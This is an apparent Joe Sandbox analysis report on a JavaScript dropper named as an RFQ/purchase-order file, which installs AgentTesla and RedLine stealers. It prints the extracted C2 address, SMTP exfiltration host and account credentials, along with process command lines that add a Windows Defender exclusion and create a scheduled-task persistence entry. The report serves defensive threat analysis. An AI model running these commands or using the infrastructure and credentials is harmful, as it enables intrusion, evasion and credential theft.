Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ -PO.20571-0001-QBMS-PRQ-0200140.js

Overview

General Information

Sample name:RFQ -PO.20571-0001-QBMS-PRQ-0200140.js
Analysis ID:1519256
MD5:5e1cdaa87915b9b6e7d852c0b7ce272b
SHA1:978f40e995fe1fd0e10f73f8b7924dd31ffb6267
SHA256:3335d593c4a2f7ab94a35fd5a0991026d1800592a18cc842686d3bf6bb66503d
Tags:jsRedLineStealeruser-abuse_ch
Infos:

Detection

AgentTesla, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected RedLine Stealer
.NET source code contains very large strings
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Installs a global keyboard hook
JavaScript file contains suspicious strings
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 2772 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ -PO.20571-0001-QBMS-PRQ-0200140.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • x.exe (PID: 4476 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: E7114D96EC31D8CD1C0233BD949D1E0F)
      • svchost.exe (PID: 3500 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • x.exe (PID: 2888 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: E7114D96EC31D8CD1C0233BD949D1E0F)
        • svchost.exe (PID: 1304 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • x.exe (PID: 1612 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: E7114D96EC31D8CD1C0233BD949D1E0F)
          • svchost.exe (PID: 5288 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
          • x.exe (PID: 6496 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: E7114D96EC31D8CD1C0233BD949D1E0F)
            • svchost.exe (PID: 5040 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • x.exe (PID: 3848 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: E7114D96EC31D8CD1C0233BD949D1E0F)
              • svchost.exe (PID: 2736 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
              • x.exe (PID: 4644 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: E7114D96EC31D8CD1C0233BD949D1E0F)
                • svchost.exe (PID: 6792 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
                  • server_BTC.exe (PID: 6832 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
                    • powershell.exe (PID: 3700 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                      • conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • WmiPrvSE.exe (PID: 3668 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
                    • schtasks.exe (PID: 1012 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
                      • conhost.exe (PID: 2452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • TrojanAIbot.exe (PID: 2868 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
                    • cmd.exe (PID: 2884 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6964.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                      • conhost.exe (PID: 5736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • timeout.exe (PID: 1824 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
                  • neworigin.exe (PID: 5496 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
                  • build.exe (PID: 7140 cmdline: "C:\Users\user\AppData\Local\Temp\build.exe" MD5: 3B6501FEEF6196F24163313A9F27DBFD)
  • TrojanAIbot.exe (PID: 1344 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)
  • TrojanAIbot.exe (PID: 4520 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Threatname: RedLine

{"C2 url": ["212.162.149.53:2049"], "Bot Id": "FOZ", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\build.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        C:\Users\user\AppData\Local\Temp\neworigin.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          C:\Users\user\AppData\Local\Temp\neworigin.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            C:\Users\user\AppData\Local\Temp\neworigin.exeINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
            • 0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
            • 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
            • 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
            • 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
            • 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
            • 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
            • 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
            • 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000010.00000002.1731769518.0000000003189000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000012.00000000.1724575722.0000000000E62000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000012.00000000.1724575722.0000000000E62000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  00000010.00000002.1731769518.0000000003112000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    00000010.00000002.1731769518.0000000003112000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 4 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      16.2.svchost.exe.3189000.2.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        16.2.svchost.exe.3189000.2.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                          19.0.build.exe.f40000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                            16.2.svchost.exe.314b000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                              16.2.svchost.exe.314b000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                                Click to see the 10 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 6832, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3700, ProcessName: powershell.exe
                                Sigma detected: WScript or CScript Dropper
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ -PO.20571-0001-QBMS-PRQ-0200140.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ -PO.20571-0001-QBMS-PRQ-0200140.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ -PO.20571-0001-QBMS-PRQ-0200140.js", ProcessId: 2772, ProcessName: wscript.exe
                                Sigma detected: Powershell Defender Exclusion
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 6832, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3700, ProcessName: powershell.exe
                                Sigma detected: Startup Folder File Write
                                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ProcessId: 6832, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                                Sigma detected: Suspicious Add Scheduled Task Parent
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 6832, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f, ProcessId: 1012, ProcessName: schtasks.exe
                                Sigma detected: Suspicious Outbound SMTP Connections
                                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\neworigin.exe, Initiated: true, ProcessId: 5496, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 62828
                                Sigma detected: Suspicious Schtasks From Env Var Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 6832, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f, ProcessId: 1012, ProcessName: schtasks.exe
                                Sigma detected: Uncommon Svchost Parent Process
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\x.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 4476, ParentProcessName: x.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ProcessId: 3500, ProcessName: svchost.exe
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ -PO.20571-0001-QBMS-PRQ-0200140.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ -PO.20571-0001-QBMS-PRQ-0200140.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ -PO.20571-0001-QBMS-PRQ-0200140.js", ProcessId: 2772, ProcessName: wscript.exe
                                Sigma detected: Non Interactive PowerShell Process Spawned
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 6832, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3700, ProcessName: powershell.exe
                                Sigma detected: Windows Processes Suspicious Parent Directory
                                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Local\Temp\x.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 4476, ParentProcessName: x.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ProcessId: 3500, ProcessName: svchost.exe

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-26T09:21:45.974042+020020432341A Network Trojan was detected212.162.149.532049192.168.2.862827TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-26T09:21:45.819379+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:21:51.238622+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:21:51.604628+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:21:51.828606+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:21:52.108691+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:21:53.186085+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:21:53.875047+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:21:54.077941+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:21:54.211040+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:21:54.356399+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:21:55.060897+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:21:55.238452+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:21:56.197571+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:21:56.202778+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:21:57.257223+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:21:57.395273+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:21:57.625513+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:21:57.654624+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:22:00.347751+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:22:00.518185+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:22:00.686262+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:22:01.476954+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:22:01.648761+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:22:01.809750+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:22:02.168029+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                2024-09-26T09:22:02.584849+020020432311A Network Trojan was detected192.168.2.862827212.162.149.532049TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-26T09:21:51.913733+020020460561A Network Trojan was detected212.162.149.532049192.168.2.862827TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-26T09:21:45.819379+020020460451A Network Trojan was detected192.168.2.862827212.162.149.532049TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus / Scanner detection for submitted sample
                                Source: RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsAvira: detected
                                Antivirus detection for dropped file
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeAvira: detection malicious, Label: HEUR/AGEN.1311721
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeAvira: detection malicious, Label: HEUR/AGEN.1311721
                                Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: HEUR/AGEN.1321671
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeAvira: detection malicious, Label: TR/Spy.Gen8
                                Source: C:\Users\user\AppData\Local\Temp\build.exeAvira: detection malicious, Label: TR/AD.RedLineSteal.dzdht
                                Found malware configuration
                                Source: 16.2.svchost.exe.3189000.2.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["212.162.149.53:2049"], "Bot Id": "FOZ", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
                                Source: 16.2.svchost.exe.314b000.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
                                Multi AV Scanner detection for dropped file
                                Source: C:\Users\user\AppData\Local\Temp\build.exeReversingLabs: Detection: 91%
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeReversingLabs: Detection: 78%
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeReversingLabs: Detection: 83%
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeReversingLabs: Detection: 83%
                                Multi AV Scanner detection for submitted file
                                Source: RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsReversingLabs: Detection: 23%
                                Machine Learning detection for dropped file
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\x.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\build.exeJoe Sandbox ML: detected
                                Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:62826 version: TLS 1.2
                                Source: Binary string: wntdll.pdbUGP source: x.exe, 00000002.00000003.1530923482.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.1530355162.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1565181805.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1565707457.0000000005050000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.1600560631.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.1600415328.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000009.00000003.1640373275.0000000004030000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000009.00000003.1640053185.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 0000000D.00000003.1680596257.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, x.exe, 0000000D.00000003.1679446140.00000000039A0000.00000004.00001000.00020000.00000000.sdmp
